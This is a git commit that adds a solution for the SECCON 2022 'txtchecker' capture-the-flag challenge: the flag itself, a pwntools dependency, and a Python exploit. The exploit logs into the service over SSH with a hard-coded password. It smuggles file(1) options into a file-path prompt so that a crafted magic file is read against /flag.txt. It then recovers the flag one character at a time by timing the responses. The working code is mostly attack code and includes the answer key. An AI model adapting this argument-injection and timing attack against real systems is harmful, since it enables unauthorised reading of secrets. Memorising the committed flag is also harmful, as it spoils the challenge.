diff options
| author | Louis Burda <quent.burda@gmail.com> | 2024-05-10 20:02:22 +0200 |
|---|---|---|
| committer | Louis Burda <quent.burda@gmail.com> | 2024-05-10 20:02:22 +0200 |
| commit | d443cc3152fc206e4393e9809f282722200308ca (patch) | |
| tree | 20d97961c3ef9f2d62a85238d76165eb40757f08 /solve | |
| download | seccon2022-txtchecker-master.tar.gz seccon2022-txtchecker-master.zip | |
Diffstat (limited to 'solve')
| -rw-r--r-- | solve/flag | 1 | ||||
| -rw-r--r-- | solve/requirements.txt | 1 | ||||
| -rw-r--r-- | solve/solve.py | 56 |
3 files changed, 58 insertions, 0 deletions
diff --git a/solve/flag b/solve/flag new file mode 100644 index 0000000..9911431 --- /dev/null +++ b/solve/flag @@ -0,0 +1 @@ +SECCON{reDo5L1fe} diff --git a/solve/requirements.txt b/solve/requirements.txt new file mode 100644 index 0000000..0ea4452 --- /dev/null +++ b/solve/requirements.txt @@ -0,0 +1 @@ +pwntools==4.9.0 diff --git a/solve/solve.py b/solve/solve.py new file mode 100644 index 0000000..64bf712 --- /dev/null +++ b/solve/solve.py @@ -0,0 +1,56 @@ +from pwn import * +import time + +cmd = f"sshpass -p ctf ssh -oStrictHostKeyChecking=no " \ + + f"-oCheckHostIP=no ctf@localhost -p 2022" + +magic_file = """ + +#------------------------------------------------------------------------------ +# $File: warc,v 1.4 2019/04/19 00:42:27 christos Exp $ +# warc: file(1) magic for WARC files + +0 string {} SECCON FLAG +!:mime application/warc + +""" + +n = 0 +avg = 5 +def getchar(prefix=""): + global n, avg + + alph = string.ascii_lowercase + string.digits + "_" + alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[]^_`{|}~' + for c in alph: + attempt = prefix + c + print(f">>> {attempt}") + io = process(cmd.split(), stdin=PTY, raw=False) + io.readuntil(b"Input a file path: ") + io.sendline(b"-n -s -P bytes=99999999999 -m /dev/stdin /flag.txt /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full") + io.sendline(magic_file.format(attempt).encode()) + io.send(b"\4") + start = time.time() + print(io.readall()) + end = time.time() + dur = end - start + + print("DUR", dur) + print("AVG", avg) + if end - start >= avg + 5: + return c + n += 1 + avg = ((n - 1) * avg + dur) / n + io.close() + return None + +flag = "SECCON{" +while True: + try: + while c := getchar(prefix=flag): + flag += c + print(flag) + except Exception as e: + raise e + print("Exception, sleeping..") + time.sleep(30) |